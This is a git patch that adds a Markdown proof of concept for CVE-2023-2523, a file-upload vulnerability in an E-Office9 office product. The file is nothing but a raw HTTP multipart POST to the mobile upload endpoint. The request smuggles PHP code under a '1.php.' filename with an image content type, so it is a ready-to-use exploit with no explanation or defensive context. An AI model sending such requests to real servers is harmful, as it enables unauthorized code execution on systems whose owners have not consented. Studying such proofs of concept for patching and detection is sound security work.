From 7d781937443ae0231f09dab398d923ef8fda9161 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 20:22:14 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=9F=90=E5=BE=AEE-Office9=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E=20CVE-2023-2523.m?=
 =?UTF-8?q?d?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 某微E-Office9文件上传漏洞 CVE-2023-2523.md | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 某微E-Office9文件上传漏洞 CVE-2023-2523.md

diff --git a/某微E-Office9文件上传漏洞 CVE-2023-2523.md b/某微E-Office9文件上传漏洞 CVE-2023-2523.md
new file mode 100644
index 0000000..6db7c2a
--- /dev/null
+++ b/某微E-Office9文件上传漏洞 CVE-2023-2523.md	
@@ -0,0 +1,20 @@
+## 某微E-Office9文件上传漏洞 CVE-2023-2523
+
+```
+POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1 
+Host:192.168.233.10:8082  
+Cache-Control:max-age=0  
+Upgrade-Insecure-Requests:1  
+Origin:null  
+Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  
+Accept-Encoding:gzip, deflate
+Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
+Connection:close
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
+Content-Type:image/jpeg
+<?phpphpinfo();?>
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+
+```